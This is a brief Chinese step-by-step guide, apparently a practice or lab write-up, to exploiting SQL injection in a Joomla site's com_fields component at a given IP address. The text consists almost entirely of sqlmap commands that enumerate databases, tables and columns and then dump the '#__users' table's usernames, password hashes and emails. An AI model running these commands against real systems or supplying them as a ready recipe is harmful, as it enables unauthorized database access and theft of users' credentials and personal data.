这里我用的是 joomla 先进入 txt 网站平台 网站:http://110.40.154.100:8080/?id=1
第一步:找注入点
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="
第二步:打开kali 用sqlmap 爆破 找其数据库名(过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" --dbs
第三步:在joomla 库中找表名 (过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables
这样表名就出来了
第四步:在表中找字段名 (过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' --columns
这样列名就出来了
最后一步 找 用户名、密码和邮箱
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' -C username,password,email --dump
稍等一会 用户名、密码和邮箱就已经破解成功了(这里的密码进行加密了,所以不用管它)